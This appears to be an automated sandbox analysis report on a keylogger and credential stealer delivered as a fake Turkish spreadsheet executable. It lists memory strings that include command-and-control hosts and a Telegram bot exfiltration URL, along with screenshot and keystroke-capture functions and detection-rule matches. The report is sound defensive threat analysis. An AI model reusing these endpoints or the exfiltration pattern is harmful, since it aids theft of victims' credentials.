Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1377186980.0000000003341000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000A.00000002.1419410557.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003198000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003189000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000003073000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003193000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003051000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003051000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: YzkHZRBcm.exe, 0000000E.00000002.3802870010.000000000307B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.000000000307B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000031C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000031C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49871 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_031DD55C	0_2_031DD55C
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DCA490	0_2_07DCA490
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC0040	0_2_07DC0040
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC8ED0	0_2_07DC8ED0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC6980	0_2_07DC6980
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC54B0	0_2_07DC54B0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC3458	0_2_07DC3458
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC3448	0_2_07DC3448
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC0007	0_2_07DC0007
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC3020	0_2_07DC3020
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC2BE8	0_2_07DC2BE8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC4B00	0_2_07DC4B00
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133C146	9_2_0133C146
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133D283	9_2_0133D283
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133C473	9_2_0133C473
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133C738	9_2_0133C738
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_013369AB	9_2_013369AB
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133E988	9_2_0133E988
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133CA13	9_2_0133CA13
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01333AA1	9_2_01333AA1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133CCDF	9_2_0133CCDF
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133CFA9	9_2_0133CFA9
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01336FC8	9_2_01336FC8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01333E09	9_2_01333E09
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01335377	9_2_01335377
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133F631	9_2_0133F631
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133E97B	9_2_0133E97B
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_013339EE	9_2_013339EE
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_013329EC	9_2_013329EC
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133FA88	9_2_0133FA88
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_0102D55C	10_2_0102D55C
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_051E6A48	10_2_051E6A48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_051E0006	10_2_051E0006
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_051E0040	10_2_051E0040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_051E6A38	10_2_051E6A38
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B9718	10_2_071B9718
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B8148	10_2_071B8148
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B6800	10_2_071B6800
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B0040	10_2_071B0040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B3458	10_2_071B3458
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B3448	10_2_071B3448
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B54B0	10_2_071B54B0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B4B00	10_2_071B4B00
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B2BE8	10_2_071B2BE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B8138	10_2_071B8138
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B0006	10_2_071B0006
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B3020	10_2_071B3020
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BC146	14_2_012BC146
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BA088	14_2_012BA088
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012B5362	14_2_012B5362
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BD278	14_2_012BD278
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BC468	14_2_012BC468
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BC738	14_2_012BC738
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012B69A0	14_2_012B69A0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BE988	14_2_012BE988
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BCA08	14_2_012BCA08
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012B3AA1	14_2_012B3AA1
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BCCD8	14_2_012BCCD8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BCFA9	14_2_012BCFA9
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012B6FC8	14_2_012B6FC8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BF631	14_2_012BF631
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BE97B	14_2_012BE97B
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012B39EE	14_2_012B39EE
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012B29EC	14_2_012B29EC
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012BFA88	14_2_012BFA88
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012B3E09	14_2_012B3E09
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059261E8	14_2_059261E8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05922D9A	14_2_05922D9A
